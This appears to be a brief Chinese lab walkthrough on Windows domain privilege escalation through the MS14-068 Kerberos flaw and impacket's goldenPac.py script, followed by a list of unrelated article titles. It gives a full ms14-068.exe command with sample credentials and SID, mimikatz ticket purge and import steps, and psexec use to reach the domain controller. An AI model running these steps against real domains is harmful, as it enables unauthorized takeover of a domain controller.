MS14-068提权和impacket工具包提权
2024-08-23 04:08:56
ms14-068提权
工具利用
a)拿下边界机win7,并已经有win7上任意一个账号的密码
-u 用户名@域
-p 用户密码
-s 用户sid
-d 域控
ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据
导入票据
导入之前,清空票据缓存
kerberos::purge
kerberos::ptc 票据
使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限
impacket工具包提权
b) 没拿到边界机,但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本
注意@domain-host 指的是域控机的位置
成功进入win08的命令行模式
最新文章
- SQL Server的AlwaysOn错误19456和41158
- Android 广播 BroadcastReceiver
- NSBundle UIImageView &;UIButton
- String对象中常用的方法
- [转]C++常见内存错误汇总
- 关于NGUI中的自适应和对齐机制
- [转]freemaker格式化日期
- 分享一个linux和linux的文件传输【scp无密码传输】
- 周根项《一分钟速算》全集播放&;amp;下载地址
- CentOS6.5 安装mysql5.6.30
- 浏览器F12进行Web程序调试
- 让你变懒的 Android Studio Live Templates
- J2ee入门:servlet-mapping的映射配置
- Linux集群时间同步方法
- 通过ClickOnce本地打包发布WPF应用程序
- this 相关
- ASP.NET Core MVC+EF Core从开发到部署
- JQuery加载列表实现动画滚动(自上而下挤)
- ORM、SQLAchemy
- 解决java.lang.IllegalStateException: The application’s PagerAdapter changed the adapter’s content
热门文章
- [洛谷 P5053] [COCI2017-2018#7] Clickbait
- 「 从0到1学习微服务SpringCloud 」06 统一配置中心Spring Cloud Config
- 资源| 学习视频库-永久有效,持续更新!附赠java面试汇总
- 从txt文本内读取数据(逐行读取),执行循环
- oc---instancetype和id的异同
- Jconsole或者VisualVM监控远程主机(阿里云,jdk11或者8)
- mybatis入门案例自定义实现
- P4语言环境安装(一)前端编译器p4c、后端编译器p4c-bm2-ss
- 如何快速打好Java基础?
- HDU_2571_DP